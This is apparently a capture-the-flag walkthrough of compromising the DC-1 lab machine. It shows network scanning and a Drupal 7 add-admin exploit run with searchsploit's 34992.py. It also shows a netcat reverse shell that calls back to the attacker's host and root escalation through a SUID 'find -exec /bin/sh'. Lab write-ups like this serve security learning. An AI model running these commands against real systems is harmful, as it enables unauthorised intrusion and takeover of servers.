Lets start with scanning the network to get the IP of the machine using “netdiscover”.

┌─[✗]─[root@NITRO]─[~]
└──╼ #netdiscover -i vboxnet1

As the machine got the IP that is 192.168.57.3, using the IP I started port scanning using “nmap”.

┌─[✗]─[root@NITRO]─[~]
└──╼ #nmap -v -sT -A -p- 192.168.57.3
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7
(protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f
(DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0
(RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8
(ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-favicon: Unknown favicon MD5:
B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php
/INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33917/udp6 status
| 100024 1 34849/udp status
| 100024 1 35201/tcp6 status
|_ 100024 1 44979/tcp status
44979/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:FA:DF:58 (Oracle VirtualBox virtual
NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Uptime guess: 0.037 days (since Fri Feb 21 15:21:23 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Their is something running on web so I switched to browser.

http://192.168.57.3

Drupal site is running on port no. 80. Here some directories are disallowed which are all listed in a robots.txt file.

http://192.168.57.3/robots.txt

Enumerating the files I came to know the version of Drupal that is Drupal 7 having a “Add Admin User” vulnerability that allows attackers to make new user and allow access to it.

┌─[root@NITRO]─[~]
└──╼ #searchsploit drupal 7

Proceeding forward with the exploit to add new user.

┌─[root@NITRO]─[~]
└──╼ #python 34992.py -t http://192.168.57.3 -u guest -p guest

User : guest

password : guest

After logging in to the site I used to install a shell module from https://www.drupal.org/project/shell

Enabling the newly installed module to use it to get the shell.

Starting a listener in a new terminal and getting reverse shell.

┌─[root@NITRO]─[~]
└──╼ #nc -nlvp 1234

After putting the listener on get the reverse shell from the shell module using “nc” ( netcat).

nc -nv 192.168.57.1 1234 -e /bin/bash

Importing the bash shell using python command to move further.

python -c 'import pty; pty.spawn("/bin/bash")'

Enumerating further I got the first flag that give the hint to move ahead.

www-data@DC-1:/var/www$ cat flag1.txt

To proceed ahead we have to know the command that we can run as root.

find / -perm /4000 2>/dev/null

Well here I came to know that the command “find” itself has to permission to run as root.

find . -exec '/bin/sh' \;

Here I have imported the bash shell.

id
whoami
cat thefinalflag.txt

Well good to see the final flag, as it tell we made it to root user.